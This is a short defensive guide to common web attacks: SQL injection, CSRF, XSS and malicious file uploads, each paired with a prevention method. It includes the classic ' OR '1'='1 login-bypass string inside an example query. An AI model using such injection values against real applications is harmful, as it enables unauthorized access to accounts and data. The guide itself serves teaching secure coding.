There are many ways to attack your application. But I would like to guide you on how to prevent the most basic and commonly used attacks.
SQL Injection
- For applications that connect to the database, we often use requests from the client to query directly to the database. Vandals will rely on this to attack the database.
- Example: A login function. The request sends a username and password to the server. You use this username and password to query directly in the database. The statement is as follows: SELECT * FROM user WHERE username=’username’ AND password=’password’
- If the attacker changes the username to ‘ OR ‘1’=’1 . The query will now become SELECT * FROM user WHERE username=” OR ‘1’=’1′ AND password=’abc’. Now all conditions are valid and the query returns true. Imagine that a saboteur inserts code that deletes tables and databases, that’s dangerous.
- Currently, all frameworks support this prevention through builder queries. This means that a template will be provided and the parameters of the input will be of text type, number type,… completely.
- Encode, your escape parameter for special characters.
- Conclusion: To avoid SQL Injection, we should not use query string(RAW) to query. Or if used, process the data before querying. Use query builds provided by frameworks.
CSRF
- Your website application sends form data to the server for processing. What would happen if an attacker captured this packet and forged another form of data to the server?
- To combat this, we use CSRF token. When submitting data sent to the server, it will be accompanied by a token. The server will check if this token is valid and allow access or not.
XSS
- This is the attack from the client. Often seen in forums, posts… . Taking advantage of the loophole of not checking the content of the post and saving it directly to the database, the attacker will rely on this point to execute a javascript to retrieve information, navigate the website, logout,…
- For websites with file upload function, file format is very important. What if you allow uploading a php file to the server, the attacker will use that file as a shell to attack your entire system.
- The way to prevent it is to escape special characters before saving them to the database. File extension format to allow file upload